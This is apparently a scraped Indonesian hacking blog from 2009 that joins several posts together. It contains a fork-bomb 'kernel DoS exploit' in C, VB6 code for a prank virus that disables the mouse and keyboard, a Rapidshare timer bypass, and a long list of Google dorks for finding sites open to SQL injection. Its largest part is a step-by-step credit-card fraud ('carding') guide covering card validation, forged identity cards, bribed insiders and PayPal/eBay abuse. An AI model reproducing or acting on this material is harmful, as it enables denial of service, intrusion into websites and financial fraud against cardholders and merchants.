v3n0m();
gunslinger();
}
}

return 0;

}


filename: masplo.c
//Local Kernel 2.6.x with socket enabled Denial of Service Exploit
//C0d3r: mywisdom ( murder of odybx and cyber tank)
//testing main loop
// what the [**sensor] of race condition
#include
int main()
{
int hack;
system("gcc -o odybxkill odybxkill.c");
for(hack=1;;)
{
system("./odybxkill &");
fork();
}

}


Source:Jasakom

Sabtu, 10 Oktober 2009

Cara Ini Cuman Berlaku Buat Yang Punya IP Address Dinamis (Bisa Berubah) 'N Yang Gak Punya
Accunt Rapidshare Premium (Buat Yang Punya Premium Cara Ini Cuman Buat Cape Dech

Pertama,
Persiapakan Peralatan Perang Yang Dibutuhkan, Seperti...
*IDM Or Sowtware File Transfer Lainnya,
Kegunaan Software Ini Buat Ngebantu Kecepatan Download Biar Lebih Cepet Image
'N Sebaeknya Install Software Ini Setelah Menginstall Browser Terlebih Dahulu Biar Si Software Dapet Ngambil Link Downloadnya,

Kedua,
*Tulis Script
Code:
javascript:alert(c=0)


'N Simpen Di Notepad Or Text,
Kegunaan Script Ini Untuk NgeReset Conter Time, Coz Counter Time Yang Di Rapidshare Sebenernya Dibuat Dengan Javascript, Lebih Enak Isikan Script Ini Pada Bookmark Browser Or Kita Bisa Menggunakan Add-ons Seperti Tix Now!, Greasemonkey 'N Kawan-Kawannya),

Ketiga,
*Usahakan Menggunakan Browser Firefox (Buat Add-On Tadi), Opera Or Safari Biar Lebih Nyaman,
Kalo Yang Suka IE Silahkan Saja )-l

Ok. Serbuuu....!!!

1. Setelah Kita Menuju TKP
Silahkan Pilih Yang Free User


'N Bakal Timbul Waktu Tunggu Yang ±45 Detik,


2. Hapus URL Tersebut


'N PasteKan Script Yang Tadi Kita Buat Ke URL Yang Kita Hapus Tadi,


3. Enter,
Nggak Perlu Panik Sampai Jungkir Balik, Bilang Saja Ok... :mrgreen: Kaya Lagu Aja dlb:

Secara Tuh Conter Time Langsung Ilang 'N Halaman Siap Downlaod Rapidshare Langsung Tersedia.


4. Tinggal Download Dah Tuh File....

Source Jasakom
buat para master ga usah baca deh dari pada nyesel baca ginian hehehehe
buat newbie aja ya !

saya di sini akan share code untuk membuat virus mempunyai efek yang jahil bukan membuat virus, kalo contoh virus saya udah pernah share deh disini ato tanya ama om master aja pasti tahu )-l

ok langsung aja udah siap program VB6 mu,
begin:
form1
====================================================
Code:
Option Explicit
Private Declare Function SwapMouseButton _
Lib "user32" (ByVal bSwap As Long) As Long
Private Const PENCET = &H100&

Private Sub Form_Load()
SwapMouseButton PENCET
End Sub
=====================================================

ini kode untuk membalikan mouse key, kiri jadi kanan, kanan jadi kiri, cukup jail kah untuk virus mu
lanjut:
module
=====================================================
Code:
Public Const VK_CAPITAL = &H14
Public Const KEYEVENTF_KEYUP = &H2
Public Declare Sub keybd_event _
Lib "user32" (ByVal bVk As Byte, _
ByVal bScan As Byte, ByVal dwFlags As Long, _
ByVal dwExtraInfo As Long)
======================================================
timer1
======================================================
Code:
Call keybd_event(VK_CAPITAL, 0, 0, 0)
Call keybd_event(VK_CAPITAL, 0, KEYEVENTF_KEYUP, 0)
=======================================================
code diatas untuk membuat fungsi keyboard gak jalan, triknya adalah membuka dan menutup caps lock berulang ulang, jangan lupa timer1 di set dengan interval 1, nah jail gak tuh
lanjut:
form1
=======================================================
Code:
Private Const VK_ESCAPE = &H1B
Private Const KEYEVENTF_KEYUP = &H2
Private Declare Sub keybd_event _
Lib "user32" (ByVal bVk As Byte, _
ByVal bScan As Byte, ByVal dwFlags _
As Long, ByVal dwExtraInfo As Long)
========================================================
timer1
========================================================
Code: Select all
Private Sub Timer1_Timer()
Call keybd_event(VK_ESCAPE, 0, 0, 0)
Call keybd_event(VK_ESCAPE, 0, _
KEYEVENTF_KEYUP, 0)
End Sub
========================================================

code ini berguna mendisable fungsi start, dengan menutupnya berulang-ulang, jangan lupa timer1 set intervalnya 1

Source:Xcode

Jumat, 11 September 2009

Ok mungkin kalian sering mendengar SQL injection tapi mengapa kalian tidak pernah mencobanya dijamin ketagihan penghilang rasa suntuk berikut ini adalah google dork yang cocok banget untuk SQL Injection dan disesuaikan berdasarkan ID jadi kita tinggal kasih tanda petik aja OK... '

Trus cari table & coloum ... brb tutorial nunggu dari master lainnya aja OK.. nie master2nya blum pada masuk closer ckck...

===================================================

inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:Pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=

inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:Productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=

===================================================

Dan berikut ini adalah google dork error SQL silahkan di jajal OK

===================================================

inurl:"id=" & intext:"Warning: mysql_fetch_assoc()
inurl:"id=" & intext:"Warning: mysql_fetch_array()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: is_writable()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: Unknown()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: pg_exec()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: mysql_query()
inurl:"id=" & intext:"Warning: array_merge()
inurl:"id=" & intext:"Warning: preg_match()
inurl:"id=" & intext:"Warning: ilesize()
inurl:"id=" & intext:"Warning: filesize()
inurl:"id=" & intext:"Warning: filesize()
inurl:"id=" & intext:"Warning: require()

===================================================

Source:Closer

Minggu, 06 September 2009

Dunia internet bukan saja menawarkan informasi dan berita terkini, tapi juga menawarkan keuntungan finansial bagi yang tahu bagaimana memanfaatkan media ini untuk menghasilkan uang. Bagaimana dan seberapa besar keuntungan yang bisa dicapai lewat media ini? Simak lebih lanjut..
Kalau bicara mencari uang di internet, siapa saja bisa melakukannya dan sangat tergantung seberapa keseriusan orang yang ingin mendapatkan uang tersebut dan juga jumlah yang akan dihasilkan. Internet sendiri merupakan media yang dapat dikatakan cukup mudah untuk menghasilkan uang bagi mereka yang mengerti karena banyak sekali peluang untuk itu dan akan semakin bertambah dari hari ke hari. Situs yang ditujukan untuk komersial atau menghasilkan uang sendiri juga sangat banyak di internet saat ini dan bahkan ada situs yang memang dirancang khusus untuk itu. Berikut kami sajikan beberapa cara yang biasanya dilakukan oleh netter untuk mendapatkan uang di internet :

1. Membuat situs untuk iklan, afiliasi dan promosi serta marketing online
Cara ini bisa dibilang paling efektif dalam mencari uang di internet dan bebas resiko karena netter hanya butuh situs baik yang gratis ataupun yang bayar sebagai media gratis 24 jam untuk menampilkan iklan seperti Google Adsenseatau menjadikan situsnya sebagai afiliasi untuk promosi penjualan barang dari situs lainnya seperti afiliasi dengan Amazon (situs penjualan buku) di mana netter bisa mendapatkan komisi dari setiap buku yang dibeli oleh netter lainnya yang masuk lewat link dari situs.
Kelebihan: bebas resiko dan mudah dilakukan
Kekurangan: netter butuh waktu untuk membuat situs dan butuh pengetahuan untuk itu serta harus sering meng-update situs supaya sering dikunjungi netter lainnyaPenghasilan: tergantung dari jumlah "hit" (netter yang mengunjungi situs) per hariContoh situs : adsense.com - amazon.com


2. Menjadi internet trader
Cara ini juga cukup efektif bagi yang rajin dan yang hobi belajar trading mata uang (Forex) karena kalau netter sampai menjadi seorang ahli trading, penghasilan yang di dapat juga bisa sangat tinggi dan bisa mendapat ratusan hingga puluhan ribu dollar per-minggu atau per-bulan. Saat inibanyak media yang menyediakan trading gratis untuk belajar dan bahkan bisa mendapatkan uang gratis untuk trading sesungguhnya seperti di Marketiva.
Kelebihan: menjanjikan keuntungan finansial yang sangat besar dan untuk pemula tidak perlu modal awal
Kekurangan: butuh waktu untuk belajar dan pengalaman untuk menjadi ahli tradingPenghasilan: tergantung seberapa rajin anda belajar dan kepintaran anda dalam ber-trading. Seorang ahli trading rata-rata bisa mendapatkan profit ribuan hingga ratusan ribu dollar per-minggu
Contoh situs: marketiva.com


3. Ber-investasi online
Cara ini mengandung resiko (bisa rugi) dan butuh modal awal untuk bisa mendapatkan profit. Untuk berinvestasi online sendiri juga butuh waktu belajar, pengalaman dan harus mengikuti ketentuan investasi baru bisa menikmati profit pada akhirnya. Banyak netter di luar negeri yang hidup dari investasi online ini dan biasanya mereka yang sudah lama berkecimpung atau yang sudah berpengalaman di bidang ini.
Kelebihan: cara yang mudah untuk mendapatkan keuntungan karena tidak membutuhkan keahlian apapun asal punya modalKekurangan: berpotensi rugi (kehilangan modal) kalau tidak hati-hati dalam berinvestasi karena banyak investasi yang menipu atau gagal bayar bahkan bangkrut karena salah kelola atau salah manajemen
Penghasilan: bervariatif tergantung dari nilai modal investasi dan profit yang dijanjikan


4. Dibayar untuk beraktifitas di internet
Cara ini juga bisa dikatakan sangat mudah tapi bisa menghabiskan waktu yang sangat banyak sedangkan profit yang didapat biasanya jumlahnya sedikit dan baru dibayar setelah mencapai jumlah tertentu yang biasanya baru bisa didapat setelah berbulan-bulan. Cara ini biasanya dilakukan oleh netter dengan mendaftarkan diri mereka untuk ikut program membaca e-mail iklan, klik iklan, surfing di internet, posting berita atau blog, memakai search engine yang semuanya biasanya ditawarkan gratis Kelebihan: termasuk cara mudah juga untuk mendapatkan uang dan tidak memerlukan modal awal berupa uang
Kekurangan: cara ini memerlukan waktu yang cukup banyak dan pada umumnya cukup membuang waktu, belum lagi kalau ada program yang tidak membayarPenghasilan: tidak efektif dan jumlah uang yang dihasilkan biasanya sangat kecilContoh situs: mylot.com , Flixya.com


5. Jualan produk, barang dan jasa lewat internet (e-commerce)
Cara ini biasanya dilakukan oleh netter yang mempunyai produk, barang dan jasa yang nilainya bisa menjual dan menghasilkan uang. Mereka biasanya membuat situs yang bisa mendukung dan memberikan informasi tentang apa yang akan dijual mereka. Kelebihan: termasuk cara efektif untuk menghasilkan uang lewat penjualan online dan promosi produk sekaligus
Kekurangan: butuh produk, barang dan jasa serta modal, pengetahuan mengelola situs dan juga sekuriti untuk situs
Penghasilan: bervariatif tergantung dari nilai produk, barang dan jasa serta daya dan jumlah pembeli dari pengunjung situs
Kesimpulan
Kalau seorang netter bisa memanfaatkan 3 dari 5 cara di atas secara efektif, saya yakin dia akan bisa memperoleh jumlah finansial yang memadai dan jumlahnya akan makin bertambah dari hari ke hari. Memang masih ada beberapa cara yang bisa dilakukan orang atau netter untuk bisa mendapatkan uang dan kelima cara di atas hanya mewakili cara yang pada umumnya dilakukan oleh orang atau netter untuk mendapatkan uang di internet.
Modal utama anda sebenarnya cuma butuh komputer yang terkoneksi ke internet untuk bisa menghasilkan uang walau beberapa cara di atas juga memerlukan modal awal untuk supaya bisa memulainya. Kecepatan koneksi mungkin juga akan sangat berpengaruh dalam beberapa hal untuk bisa memperlancar usaha anda untuk mendapatkan uang di internet.
Selama mencoba!

Sumber : Ketok.com

Senin, 18 Mei 2009

Bukan maksud utk menggurui rekan carder Indonesia lainnya, maka dgn segala kerendahan hati kami mencoba utk membagi Tips dan Tricks ini utk rekan - rekan yg ingin mencoba terjun dalam kegiatan carding....

...:::Bagi rekan carder yg memiliki nomor extrapolate, dpt mencoba membuat e-mail bayar pada Network Solutions(netwoksolution) dgn tdk menambah account (JANGAN klik menu pull down : add 1 account e-mail. Sebab kita memanfaatkan NetSol hanya utk mengetahui nomor extrapolate tsb masih berlaku atau tidak), ikuti prosedur selanjutnya, sampai pada sesion pemasukan nomor tadi. Ulangi pengisian nomor apabila ditolak, gunakan nomor lainnya. Jika anda merasa sulit untuk validasi di NetSol (saat ini semakin sulit), kami mencoba memberikan alternatif URL yang dapat anda jadikan referensi dalam hal daftar perusahaan-perusahaan register domain (hanya utk test nomor kartu kredit), yaitu pada internicAtau dpt juga membeli software - software murah di situs - situs penjual software:::...

...:::Anda dpt mengunjungi toko - toko yg ada pada website ini, yg sebagian besar telah kami coba. Dan jgn khawatir, keterangan disamping tokonya adalah pengalaman kami sebenarnya. Masalah sedikit banyaknya yg sudah mengorder di toko tersebut, kami tdk jamin 100%, namun perlu diketahui bhw situs ini tadinya situs pribadi. Jadi sebelum publikasi, hanya "bA" yg mengorder, dan barang yg diorder kuantitasnya minimal sekali, namun rutin (lihat pada halaman 1 daftar online shop, toko timeclub.com yg berkali-kali mengirim barang dlm kurun waktu 1 tahun terakhir ini/th2008):::...

...:::Anda dpt mengorder barang senilai LEBIH DARI US$ 1000 dgn menggunakan trick : *Gunakan identitas palsu pada saat mengambil barang di kantor pos atau jasa pengiriman lainnya (....dgn memalsukan KTM/Kartu Tanda Mahasiswa biasanya lebih mudah, dan foto yg tampak di KTM palsu tadi harus sesuai dgn wajah si "X" yg mengambil barang tsb, di kantor pos atau jasa pengiriman lain). Sedangkan namanya, tetap nama si "X", hanya alamat di kartu identitas yang kita palsukan. Jika ditanya kenapa alamatnya berbeda, alasannya : "....itu alamat lama, dan saya sudah pindah rumah/kost". Apabila nama si "X" (pengambil barang) berbeda dengan nama yang dikirimi barang (hasil dari order), biasanya pihak kantor pos atau jasa pengiriman lainnya akan meminta surat kuasa:::...

...:::Anda dpt mengorder barang senilai US$ 500 dgn menggunakan trick : (bisa juga menggunakan trick diatas) *Bisa menggunakan nama dan alamat asli, karena order barang senilai US$ 500 masih tergolong rendah, atau gunakan alamat Warung Internet (Warnet) tempat anda biasa mengakses (tentunya bekerja sama dengan si penjaga Warnet tsb.):::...

...:::Anda dpt mengorder barang kurang dari US$ 200 dgn aman apabila nomor tersebut bukan milik orang di Indonesia:::...

...:::Apabila anda menggunakan nomor extrapolate yg sudah digunakan pada saat proses validasi di Network Solutions, berarti nomor tersebut telah dicharge sebesar yg anda masukkan tadi, makanya buat serendah - rendahnya dlm membuat domain tadi, misalnya .org (..sekitar US$ 60). So, kalo udah gitu, utk mengetahui besarnya biaya charge dari nomor tsb tinggal jumlahkan aja harga barang yg diorder dengan biaya yg udah dicharge di NetSol tadi. Bila harga barang yg diorder senilai US$ 45, berarti nomor extrapolate yg kita gunakan tsb sudah dicharge sebesar US$ 105:::...

...:::Pada saat proses order (shopping), pengisian data Nama, Alamat dan lainnya milik kita (pembeli/shopper), harus sama dengan alamat yg akan dikirimi barang. Misalnya, si "X" mengorder barang, maka pengisian Billing Address (alamat faktur si pemesan) dan Shipping Address (alamat tujuan pengiriman barang) HARUS SAMA. Jika dlm billing address yg memesan barang atas nama "X", maka pengisian nama pada shipping address harus nama si "X" tadi:::...

...:::Jika anda tinggal di Propinsi Surabaya, sebaiknya alamat pengiriman barang jgn dikirim ke Kota BONEK tsb. Karena apabila anda tidak ada kongkalikong dengan pihak kantor pos atau jasa pengiriman lainnya, jgn pernah mengharap barang akan datang. Apa lagi untuk barang - barang yg tergolong 'wah', namun jika majalah dan CD serta sejenisnya, kemungkinan besar masih bisa. Sebagai masukan, Surabaya menduduki peringkat ke-2 setelah Yogyakarta dlm event kegiatan carding di Asia, sementara Indonesia sendiri menduduki peringkat III dunia masih dlm event kegiatan carding. Bahkan dalam waktu dekat, Indonesia mungkin bisa meraih peringkat I di dunia:::...

...:::Besarnya biaya penebusan dpt bervariasi, tergantung dari (pajak) barang yg kita order (biasanya mulai dari Rp 3000,- sampai lebih dari Rp 100.000,-). Atau ada juga barang yg dikirim langsung ke alamat tujuan. Jangan takut dulu bila anda disuruh menebus dgn biaya tinggi, karena kemungkinan besar barang yg dikirim itu nilainya lebih dari biaya penebusan:::...

...:: alam pengisian alamat e-mail (milik kita) utk jalur konfirmasi dari pihak online shop, sebaiknya gunakan alamat 'e-mail bayar'. Karena, selain tidak ada banner (menghemat waktu loading), ada sedikit nilai tambah di mata pihak online shop yg kita order barangnya:::...

...:::Tidak semua online shop yg ada lambang VeriSign di websitenya aman dan ketat dalam proses validasi kepemilikan kartu kredit, jadi jangan patah semangat dulu. Kecuali, pihak online shop melibatkan pihak Pay Pal (pihak ketiga sbg perantara yg menangani sistem pembayaran), itu pun masih bisa kita akali. Caranya, manfaatkan account milik orang bule juga di Pay Pal, lalu gunakan saja dgn percaya diri penuh, seolah - olah kita yg punya account tsb:::...

...:::Jika anda shopping di online shop selain yg berbahasa Inggris, sebaiknya diperhatikan metode pembayarannya/payment sistem/payment methode (kecuali anda menguasai bahasa di negara online shop tsb). Karena jika anda tidak teliti, bisa - bisa anda memilih metode pembayaran cash on delivery (pembayaran dilakukan di alamat tujuan). Tapi, bila metode seperti itu yg anda pilih, maka biasanya pihak online shop akan menanyakan (mengirim e-mail konfirmasi) lagi, "....apakah barang tersebut benar - benar mau dikirim ?" Solusinya : anda reply e-mailnya, dan katakan anda tidak jadi memesan, karena besok anda harus berangkat ke Singapura atau Hongkong, etc. untuk urusan kantor:::...

...:::Bila anda mendapat e-mail konfirmasi dari pihak online shop berupa ancaman (..beberapa waktu setelah anda melakukan order), yg mengatakan mereka akan mengadukan perbuatan anda ke federasi/organisasi internasional yg menangani penipuan (fraud) kartu kredit dan akan mengenakan denda sebesar US$ 1000 atas perbuatan anda, jangan takut dulu. Karena itu hanya geretak si customer service online shop aja. Sebab kemungkinan besar, pihak online shop tsb sudah pernah terkena biaya recharge (tagihan balik, alias mengganti biaya produksi kepada si pemilik nomor kartu kredit yg asli). Nah, cuekin aja deh solusinya, masih bejibun online shop yang lain:::...

...:::Jika anda dikirimi email konfirmasi dari pihak online shop berupa e-mail kosong, namun ada file berekstensi .exe yg disertakan di attachment, lebih baik jangan didownload/dieksekusi file tadi. Apalagi jika anda yg mengakses Internet dari rumah (bukan di tempat umum), karena kemungkinan besar file tersebut mengandung trojan. Bila yang mengakses dari tempat umum (misalnya Warnet) dan sudah terlanjur mendownload/mengeksekusi file tersebut, sebaiknya anda berhenti mengakses. Dan pindahlah ke komputer client lainnya, atau bila ingin lebih fresh, pindah ke Warnet lain. Sedangkan jika anda mengakses Internet dari rumah, untuk menjaga kemungkinan dari bahaya trojan, anda bisa menginstall ulang sistem operasi pd komputer anda (dgn asumsi, anda harus menghapus bersih folder sistem operasi anda tersebut sebelum reinstall), dengan sistem operasi yg masih fresh:::...

...:::Catat semua barang yg anda order, dan dikirim atas nama siapa, jgn lupa catat juga tanggalnya. Sebab banyak juga online shop yg tdk mengirimkan e-mail konfirmasi ketika barang akan dikirim. Atau bahkan tidak mengirimkan e-mail konfirmasi kepada kita, saat setelah melakukan order (email konfirmasi biasa, setelah kita order). Gunanya, apabila ada order yg berhasil dikirim, dan atas nama si "X", kita bisa memperkirakan barang apa yg datang, dgn melihat catatan tadi, bhw si "X" memesan barang a, b, atau c (jadi ada nilai kemungkinannya):::...

...:::Jika anda disebut sebagai thief, frauder, etc., pada e-mail konfirmasi dari online shop, cuekin aja, jangan dibalas, karena masih banyak online shop lainnya:::...

...:::Setiap order yg berhasil (barangnya datang), biasanya anda mendapat surat panggilan dari Kantor Pos atau Jasa Pengiriman (<== via telepon) lainnya utk menebus barang tersebut (..utk barang yg kecil biasanya langsung dikirim ke alamat tujuan). Tebuslah barang tsb !! (Apalagi jika anda mengorder barang dalam jumlah besar), guna menjaga kemungkinan barang tsb dialihkan ke Kantor Polisi atau pihak berwenang lainnya:::...

...:::Hindari pemesanan/order yang besar - besar terutama untuk merk - merk terkenal dan mahal, serta perlu diperhatikan JUMLAH barang yg diorder dalam satu kali transaksi, karena jika terlalu banyak dapat menimbulkan kecurigaan pihak online shop/store:::...

...:::Jadilah orang yg sabar, hindari pemesanan yang menggunakan pengiriman express. Sebab, untuk menjaga kewajaran dalam pengeluaran dana dari nomor kartu kredit yg digunakan tersebut. Sehingga pihak online shop/store, berprasangka bahwa kita orang yg cukup memperhitungkan pengeluaran dana:::...

...:::Kesabaran, ketelitian, dan keuletan merupakan modal dasar yg hrs anda miliki. Hilangkan sifat takabur, karena hanya akan mendatangkan kehancuran. Siapkan percaya diri sepenuhnya, seakan - akan kita si pemilik nomor/account (hal ini sangat baik dalam pembentukan mental carder):::...

...:::Pelajari teknik hacking/cracking step by step:::...

...:::Jangan lupa berdoa kepada Tuhan YME, sesuai dgn agama dan kepercayaan anda. Semoga kita semua dalam lindungan-Nya. Amin:::...

Alternatif Lain:

GANTI PROXY ANDA ( PROXY DIDAPAT DAN DI CHECK DI stay invisibleANTI PROXY SESUAI DENGAN NEGARA KARTU KREDIT ANDA
- KETIKA KARTU KREDIT SUDAH SIAP DAN PROXY SUDAH SIAP MAKA CHECK
KARTU KREDIT DI wallet
YAHOO WALLET
- setelah dapat kartu kredit yang ok, beli email bayar di yahoomail plus
- dengan email bayar tersebut daftarkan di account ebay
- lalu mengecek keberadaan uangnya di ibsNGECEK ISI CC DAN
INFORMASI CC
setelah ada uangnya. buatlah account Paypal dengan cara subscription.
- setelah urusan pembayaran telah siap, maka lakukan penawaran barang di ebay
- setelah ada barang yang dibayar, maka bayarlah dengan account di Paypal

TIPS DAN TEKNIK :
- SITUS wallet( type security rendah = asal CCnya bukan USA )
- situs ebaytype security rendah, lakukan transaksi yang bisa dikirim ketempat anda)
-ibs authorizationCHECK VALIDITAS DAN ISI CC (type security tinggi, harus ganti
proxy dan sangat ketat )
jika memakai kartu kredit generate kemungkinan nya isi kartu kreditnya bisa dilihat 60% saja.
-paypal(type security tinggi, jika memakai kartu kredit generate hanya 50% accountnya
bisa dipakai).
- INGAT WALAUPUN SUDAH LOLOS YAHOO WALLET BELUM TENTU BERHASIL
DIBELANJAKAN KARENA MUNGKIN SAJA UANGNYA SUDAH HABIS
JADI ngecek di ibs autorizationwajib karena ada metode
lainnya yaitu account di bidpay.

tips selanjutnya :
- lebih baik memakai kartu kredit asli, atau jika memakai kartu kredit generate
setelah lolos walletcheck apakah ada uangnya tidak di Ibs Authorization jika sudah ada. maka pada penjual barang untuk dibayar lewatbidpay
- tingkat security bidpaylebih rendah dibandingkan Paypal

tips selanjutnya :
- setelah barang selesai dibeli dan dibayar mintalah pada penjual untuk mengirimkan barangnya
sebagai kado atau hadiah untuk
saudara. maka buatlah ktp asli tapi palsu.dan mintalah pada penjual barangnya agar barang dikirim
dengan settingan hargapenjualan cuman dibawah 100$ (untuk menghindari pajak yang besar)
- gunakan kotak pos atau teromolpos (langganan sebaiknya )
- cari orang dalam untuk mengambil barang kita ( upah orang dalam Rp 200.000/paket = paket
dibawah 5 juta =)

salam hangat buat seluruh RAJA CARDING di INDONESIA
SEMOGA CARDING TETAP JAYA

Copy From Aceh Forum
CARDER


* SEJARAH CARDER

Dimasa ini seorang cracker berkembang dengan sangat pesat dan saat itu pula muncul sekelompok orang-orang pintar dalam hal-hal crack kartu credit dan kemudian mereka dinamakan carder. Entah oleh siapa kata cracker itu didapat yang jelas sekarang mereka dinamakan cracker.


* PENGERTIAN CARDER

Carder adalah sebutan untuk mereka yang membobol Credit Card dan bertujuan menggunakannya untuk kepentingan sendiri seni carder adalah seni ketepatan kencocokan data yang mereka dapat dari korbannya dan menggunakan data tersebut untuk membeli barang di shop online/lainnya.


Sesungguhnya di dunia ini tidak ada yang sempurna.....Carder adalah sebuah peran dari sederet status sosial di dunia ini.Seorang anak manusia yang butuh penghargaan untuk sebuah harga diri yang tekoyak dan tercoreng oleh sebuah aktivitas....Tidak adakah tempat di hati para manusia untuk seorang carder ?





Sebenarnya pengertian carder sangat luas tapi mungkin hanya ini yang bisa saya jelaskan untuk lebih jelasnya kalian bisa berkunjung ke site Carder legendaris Indonesia :yogya carding

Source:Closer
1. Joe Desch
Orang ne bsa d bilang berjasa bwt Nazi loch, Gara2 dy..Code pemecah yg akan di pake USA bwt mecahin Kode Nazi Jadi Bome berbalik yg menyerang USA ( gw aja g mudeng maksudnya gmn, n kode yg gmn )



2. Shambhu Upadhyaya
dy dari india, Konon katanya dy mantan hacker, Nmun skrg tobat dan bekerja sebagai kepala penelitian dari Center of Excellence in Information Systems Assurance
Research and Education at the State University of New York



3. Robert Lipka
Ditangkep ama FBI Hari jum’at tanggal Feb. 23, 1996 atas tuduhan mata2
untuk Uni Soviet pada tahun 1960an.



4. Jerome Heckenkamp
Ne dy Hacker muda yg udah ngraup puluhan juta Dollar dari website² dunia, bahkan FBI langsung yg trun tngan bwt nangkp ne orang.



5. James S. Green II
Sbnrnya ne orang bkn hacker propesional, dy aja amntan kepala keamanan, Liat aja Mukanya..serem kan
g tw knp dy bisa membobol situs jaminan sosial suatu perusahaan motor dan meng Hack smua daftar pegawai2 d sana.



6. Sarah Palin
Dituduh hacking atas komputernya Randy Ruedrich (Politikus Alaska).
Niatnya cuma pengen nyari bukti atas politikus tersebut atas
keterlibatanya dalam tindakan melawan hukum sewaktu politikus tersebut
menjadi anggota Alaska Oil & Gas Conservation Commission.



7. Jonathan James
Coba tebak hacker ne berumur brp? Baru 16 tahun, tpi dy dah bsa ngehack Situs Pentagon n mencuri Data² Nasa.



8. Onel A. de Guzman
Weitsss…. jangan liat dari culunya nih orang… Dia orang Pilipina.
Klo lo2 pernah denger virus "Love Bug" yang disebarin lewat e-mail…
Nah ini dia nih orangnya….



Source:Closer
1) DDoS (Distributed Denial Of Service) [classic]
Distributed Denial Of Service digunakan seorang hacker untuk mengambil
resource didalam network tanpa adanya autorisasi. Sebelumnya hacker harus
melakukan FTP Attack.

2) IP Spoofing (Atau Source Address Spoofing)
pemalsuan alamat IP hacker sehingga sasaran menganggap alamat IP hacker adalah alamat IP dari host di dalam network bukan dari luar
network. Misalkan hacker mempunyai IP address type A 66.25.xx.xx ketika hacker melakukan
serangan jenis ini maka Network yang diserang akan menganggap IP hacker adalah bagian dari
Networknya. IP Spoofing terjadi ketika seorang hacker menghack
packet routing untuk mengubah arah dari data atau transmisi ke tujuan yang berbeda. Packet untuk
routing biasanya di transmisikan secara transparan dan jelas sehingga membuat hacker dengan mudah
untuk memodifikasi asal data ataupun tujuan dari data.

3) FTP Attack (File Transfer Protocol Attack)
serangan buffer overflow yang diakibatkan oleh malformed command. tujuan menyerang FTP server ini rata-rata adalah untuk
mendapatkan command shell ataupun untuk melakukan DDoS.

4) UFE (Unix Finger Exploits)
Serangan ini terjadi karena kesalahan sistem Administrator yang tidak menggunakan keamanan sedikit atau sama sekali tidak.
Point ini terlalu berharga untuk dilewatkan, ...... Very Happy

5) Flooding & Broadcasting (Pembanjiran server)
Serangan ini digunakan dengan tools-tools untuk pembanjiran server. Misalkan TrashAttack. Tujuan serangan ini adalah
